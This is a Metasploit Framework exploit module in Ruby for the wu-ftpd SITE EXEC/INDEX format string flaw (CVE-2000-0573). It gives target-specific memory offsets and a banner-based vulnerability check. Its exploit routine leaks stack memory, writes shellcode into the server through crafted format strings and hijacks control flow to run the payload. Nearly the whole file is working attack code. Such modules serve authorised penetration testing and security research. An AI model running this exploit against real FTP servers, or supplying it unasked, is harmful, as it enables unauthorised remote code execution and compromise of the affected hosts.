### ## This file is part of the Metasploit Framework and may be subject to ## redistribution and commercial restrictions. Please see the Metasploit ## Framework web site for more information on licensing and terms of use. ## http://metasploit.com/framework/ ### require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::FormatString def initialize(info = {}) super(update_info(info, 'Name' => 'wu-ftpd SITE EXEC/INDEX Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in versions of the Washington University FTP server older than 2.6.1. By executing specially crafted SITE EXEC or SITE INDEX commands containing format specifiers, an attacker can corrupt memory and execute arbitrary code. }, 'Author' => [ 'jduck' ], 'References' => [ ['OSVDB', '11805'], ['CVE', '2000-0573'], ['BID', '1387'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'PrependChrootBreak' => true }, 'Privileged' => true, 'Payload' => { # format string max length 'Space' => 256, # NOTE: \xff's need to be doubled (per ftp/telnet stuff) 'BadChars' => "\x00\x09\x0a\x0d\x20\x25\x2f", 'DisableNops' => 'True', 'StackAdjustment' => -1500 }, 'Platform' => [ 'linux' ], 'Targets' => [ # # Automatic targeting via fingerprinting # [ 'Automatic Targeting', { 'auto' => true } ], # # specific targets # [ 'Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)', { 'UseDPA' => false, 'PadBytes' => 3, 'NumPops' => 8, 'AddrPops' => 100, 'Offset' => -2088, # offset to stack return 'Writable' => 0xbfffde26, # stack, avoid badchars 'FlowHook' => -1, # auto now... 0xbffff1e4 # stack return addr } ], # these aren't exploitable (using built-in, stripped down vsprintf, no %n) #[ 'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)', #[ 'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)', #[ 'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)', [ 'RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)', { 'UseDPA' => true, 'PadBytes' => 2, 'NumPops' => 276, 'AddrPops' => 2, 'Offset' => -17664, # offset to stack return 'Writable' => 0x806e726, # bss #'Writable' => 0xbfff0126, # stack, avoid badchars 'FlowHook' => -1, # auto now... 0xbfffb028 # stack return addr #'FlowHook' => 0x806e1e0 # GOT of sprintf } ], # # this one will detect the parameters automagicly # [ 'Debug', { 'UseDPA' => false, 'PadBytes' => 0, 'NumPops' => 0, 'AddrPops' => -1, 'Offset' => -1, 'Writable' => 0x41414242, # 'FlowHook' => 0x43434545 # } ], ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(21), ], self.class ) end def check connect_login print_status("FTP Banner: #{banner.strip}") status = Exploit::CheckCode::Safe if banner =~ /Version wu-2\.(4|5)/ status = Exploit::CheckCode::Appears elsif banner =~ /Version wu-2\.6\.0/ status = Exploit::CheckCode::Appears end # NOTE: vulnerable and exploitable might not mean the same thing here :) if not fmtstr_detect_vulnerable status = Exploit::CheckCode::Safe end if not fmtstr_detect_exploitable status = Exploit::CheckCode::Safe end disconnect return status end def exploit connect_login # Use a copy of the target mytarget = target if (target['auto']) mytarget = nil print_status("Automatically detecting the target...") if (banner and (m = banner.match(/\(Version wu-(.*)\) ready/))) then print_status("FTP Banner: #{banner.strip}") version = m[1] else print_status("No matching target") return end regexp = Regexp.escape(version) self.targets.each do |t| if (t.name =~ /#{regexp}/) then mytarget = t break end end if (not mytarget) print_status("No matching target") return end print_status("Selected Target: #{mytarget.name}") else print_status("Trying target #{mytarget.name}...") if banner print_status("FTP Banner: #{banner.strip}") end end # proceed with chosen target... # detect stuff! if mytarget.name == "Debug" #fmtstr_set_caps(true, true) # dump the stack, so we can detect stuff magically print_status("Dumping the stack...") stack = Array.new extra = "aaaabbbb" 1000.times do |x| dw = fmtstr_stack_read(x+1, extra) break if not dw stack << dw end stack_data = stack.pack('V*') print_status("Obtained #{stack.length*4} bytes of stack data:\n" + Rex::Text.to_hex_dump(stack_data)) # detect the number of pad bytes idx = stack_data.index("aaaabbbb") if not idx print_status("Whoa, didn't find the static bytes on the stack!") return end num_pad = 0 num_pad = 4 - (idx % 4) if (idx % 4) mytarget.opts['PadBytes'] = num_pad # calculate the number of pops needed to hit our addr num_pops = (idx + num_pad) / 4 mytarget.opts['NumPops'] = num_pops else num_pad = mytarget['PadBytes'] num_pops = mytarget['NumPops'] sc_loc = mytarget['Writable'] ret = mytarget['FlowHook'] end print_status("Number of pad bytes: #{num_pad}") print_status("Number of pops: #{num_pops}") # debugging -> don't try it! return if mytarget.name == "Debug" #print_status("ATTACH!") #sleep(5) fmtstr_detect_caps # compute the stack return address using the fmt to leak memory addr_pops = mytarget['AddrPops'] offset = mytarget['Offset'] if addr_pops > 0 stackaddr = fmtstr_stack_read(addr_pops) print_status("Read %#x from offset %d" % [stackaddr, addr_pops]) ret = stackaddr + offset end print_status("Writing shellcode to: %#x" % sc_loc) print_status("Hijacking control via %#x" % ret) # no extra bytes before the padding.. num_start = 0 # write shellcode to 'writable' arr = fmtstr_gen_array_from_buf(sc_loc, payload.encoded, mytarget) # process it in groups of 24 (max ~400 bytes per command) sc_num = 1 while arr.length > 0 print_status("Sending part #{sc_num} of the payload...") sc_num += 1 narr = arr.slice!(0..24) fmtbuf = fmtstr_gen_from_array(num_start, narr, mytarget) # a space allows the next part to start with a '/' fmtbuf[num_pad-1,1] = " " fmtbuf.gsub!(/\xff/, "\xff\xff") if ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true))) if res[0,4] == "500 " throw "Crap! Something went wrong when uploading the payload..." end end end # write 'writable' addr to flowhook (execute shellcode) # NOTE: the resulting two writes must be done at the same time print_status("Attempting to write %#x to %#x.." % [sc_loc, ret]) fmtbuf = generate_fmt_two_shorts(num_start, ret, sc_loc, mytarget) # a space allows the next part to start with a '/' fmtbuf[num_pad-1,1] = " " fmtbuf.gsub!(/\xff/, "\xff\xff") # don't wait for the response here :) res = send_cmd(['SITE', 'EXEC', fmtbuf], false) print_status("Your payload should have executed now...") handler end # # these two functions are used to read stack memory # (used by fmtstr_stack_read() # def trigger_fmt(fmtstr) return nil if fmtstr.length >= (512 - (4+1 + 4+1 + 2 + 2)) send_cmd(['SITE', 'EXEC', 'x', fmtstr], true) end def extract_fmt_output(res) if res[0,4] == "500 " #throw "Crap! Something went wrong while dumping the stack..." return nil end ret = res.strip.split(/\r?\n/)[0] ret = ret[6,ret.length] return ret end end